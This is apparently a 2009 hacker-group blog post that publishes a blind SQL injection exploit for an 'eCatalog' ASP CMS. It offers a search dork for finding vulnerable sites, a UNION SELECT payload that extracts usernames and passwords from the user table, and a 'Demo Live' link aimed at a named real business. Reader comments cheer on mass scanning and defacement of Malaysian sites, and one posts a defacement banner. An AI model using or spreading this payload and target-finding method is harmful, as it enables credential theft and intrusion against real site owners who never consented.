eCatalog [MalingSial CMS] – Blind SQL Injection Vulnerability

————————————————————————————————————————————————————-

Author          : YaDoY666

Contact         : YaDoY666[a]ServerIsDown[dot]Org

Group            : ServerIsDown

Date              : September 27th, 2009

————————————————————————————————————————————————————-

[-]  Dork

[+] “catalog/details.asp?id=” or use your own keyword

[-] Exploit

[+]  details.asp?id=[id]+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user

[-] POC

http://127.0.0.1/catalog/details.asp?id=706+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user

[-] Demo Live

http://www.honourfurniture.com.my/catalog/details.asp?id=771+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user

[-] Greetz

Jack-, Don Tukuleso, XShadow, Kecemplungkalen, v3nom, indounderground, mistersaint, m3g4tr0n, gblack, miya666, ServerIsDown, Mainhack Brotherhood, Indonesian Coder, You.

- Proud To Be Indonesian -

[*] Cepet sembuh yah mi, Luph you always [*]

  • Share/Bookmark

15 Comments

  1. Jack says:

    PERTAMAX!!
    Wow,.. keren doy :”>
    saya suka dengan ini…
    *BRB* SCAN
    semoga tidak gagal pertamax :D

  2. YaDoY666 says:

    Hahahaha…
    Silahkan Jack-

  3. YaDoY666 says:

    Yuuuk mareeee

    Ratakan…!!!

  4. jojo says:

    ayo dong gan,,,,,,,, btw gan situs jasakom di hack ya………….

  5. YaDoY666 says:

    Apaan yg ayo?

    jasakom di hack? dah di hack balik tuh… :P

  6. denbayan says:

    @ jojo : tapi di pojok kiri bawah transfer dari jatimcrew
    mending jangan dibuka lagi , katanya bahaya ,,,,,
    maaf so tau ,,,

  7. paddi says:

    Wahhh, mata jadi sakit nih liat warnanya,wkwkwkw

  8. kaka11ai.net says:

    Salam Hormat suhu2 dan shifu2….

  9. kaka11 says:

    Salah nulis nama pulak…wakakakka…

  10. andri says:

    mas…
    nie hanya permintaan kecil saya dan newbie yang laen di seluruh nusantara…
    gimana kalau website anda membuat artikel tentang semua artikel mengenai website yang sudah di hack….
    khusus na website malaysia….
    apa lagi sekarang lagi marak2 tapi informasi na hanya alamat website yang sudah dihack..
    walaupun kami tidak bisa membantu dalam menghack website malaysia tapi kami butuh informasi tentang apa yang sudah dihack…
    tolong ya mas yadoy666

  11. ciute says:

    ..::HACKED BY CIUTEGIRL::..
    Earth Under Attack :
    thanks –>>>: HACKER NEWBIE..::(C1u7e G1rl)::..http://www.ciutegirl.comcontact us: ciutegirl@rocketmail.com
    </DI

  12. coboyina says:

    ‘thanks buat tutorialnya
    ’support buat dulur2 semua yg dah hack sites si MaLIng tukang nyokot budaya urang… Sori teu bisa bantu banyak.. Can bisa web sih ngan bisa VB hungkul T_T
    Ajarin atuh a’

  13. Joglo says:

    maknyus ene doy.. dapet banyak @_@

Leave a Reply